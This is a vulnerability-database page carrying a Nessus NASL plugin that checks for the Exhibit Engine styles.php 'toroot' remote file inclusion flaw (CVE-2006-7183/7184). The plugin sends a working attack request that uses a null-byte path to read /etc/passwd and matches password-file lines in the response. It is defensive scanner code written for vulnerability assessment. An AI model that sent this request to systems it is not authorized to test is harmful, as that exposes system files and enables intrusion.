Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2006-2022 Justin SeitzEXHIBIT_ENGINE_RFI.NASL
HistoryNov 14, 2006 - 12:00 a.m.

Exhibit Engine styles.php toroot Parameter Remote File Inclusion

2006-11-1400:00:00
This script is Copyright (C) 2006-2022 Justin Seitz
www.tenable.com
18
JSON

The remote web server is running Exhibit Engine, a PHP based photo gallery management system.

The version of Exhibit Engine installed on the remote host fails to sanitize input to the ‘toroot’ parameter before using it in the ‘styles.php’ script to include PHP code. Provided PHP’s ‘register_globals’ setting is enabled, an unauthenticated attacker can exploit this issue to view arbitrary files and execute arbitrary code, possibly taken from third-party hosts, on the remote host.

#%NASL_MIN_LEVEL 70300
#
#       This script was written by Justin Seitz <[email protected]>
#	Per Justin : GPLv2
#
# Changes by Tenable:
# - Revised plugin title (1/02/2009)

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(23640);
  script_version("1.21");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2006-7183", "CVE-2006-7184");
  script_bugtraq_id(20793, 21313);

  script_name(english:"Exhibit Engine styles.php toroot Parameter Remote File Inclusion");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is affected by a
remote file include issue.");
  script_set_attribute(attribute:"description", value:
"The remote web server is running Exhibit Engine, a PHP based photo
gallery management system. 

The version of Exhibit Engine installed on the remote host fails to
sanitize input to the 'toroot' parameter before using it in the
'styles.php' script to include PHP code.  Provided PHP's
'register_globals' setting is enabled, an unauthenticated attacker can
exploit this issue to view arbitrary files and execute arbitrary code,
possibly taken from third-party hosts, on the remote host.");
  script_set_attribute(attribute:"solution", value:
"No patches or upgrades have been reported by the vendor at this time.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:W/RC:ND");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2006/11/26");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/11/14");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2022 Justin Seitz");

  script_dependencies("http_version.nasl");
  script_require_keys("www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");
include("data_protection.inc");

port = get_http_port(default:80, embedded:TRUE);

#
# verify we can talk to the web server, if not exit
#

if(!get_port_state(port)) exit(0);
if(!can_host_php(port:port)) exit(0);

#
# create list of directories to scan
#


# Loop through directories.
if (thorough_tests) dirs = list_uniq(make_list("/gallery","/photos","/images","/exhibit","/exhibitengine","/ee", cgi_dirs()));
else dirs = make_list(cgi_dirs());
#
# Iterate through the list
#

file = "/etc/passwd";

foreach dir (dirs) {

#
#
#       Attack: Attempt a remote file include of /etc/passwd
#
#
  attackreq = http_get(item:string(dir, "/styles.php?toroot=", file, "%00"),port:port);
  attackres = http_keepalive_send_recv(port:port, data:attackreq, bodyonly:TRUE);
  if (attackres == NULL) exit(0);

  if (egrep(pattern:"root:.*:0:[01]:", string:attackres) ||
    string("main(", file, "\\0styles/original.php): failed to open stream") >< attackres ||
    string("main(", file, "): failed to open stream: No such file") >< attackres ||
    "open_basedir restriction in effect. File(" >< attackres)   {

    passwd = "";
    if (egrep(pattern:"root:.*:0:[01]:", string:attackres))
      passwd = attackres;

    if (passwd) {
      if (dir == "") dir = "/";
      passwd = data_protection::redact_etc_passwd(output:passwd);
      info = string("The version of Exhibit Engine installed in directory '", dir, "'\n",
        "is vulnerable to this issue. Here are the contents of /etc/passwd\n",
        "from the remote host :\n\n", passwd);
      security_warning(port:port, extra: info);
    }
    else
      security_warning(port:port);

    exit(0);
  }
}

Related

securityvulns 1
cve 2
openvas 2
securityvulns
securityvulns
PHP, ASP, CGI web applications security vulnerabilities
2005-06-03 00:00:00
cve
cve
CVE-2006-7183
2007-03-30 21:19:00
CVE-2006-7184
2007-03-30 21:19:00
openvas
openvas
Exhibit Engine toroot Parameter Remote File Include Vulnerability
2008-10-24 00:00:00
Exhibit Engine toroot Parameter Remote File Include Vulnerability
2008-10-24 00:00:00
JSON
Related for EXHIBIT_ENGINE_RFI.NASL
securityvulns1cve2openvas2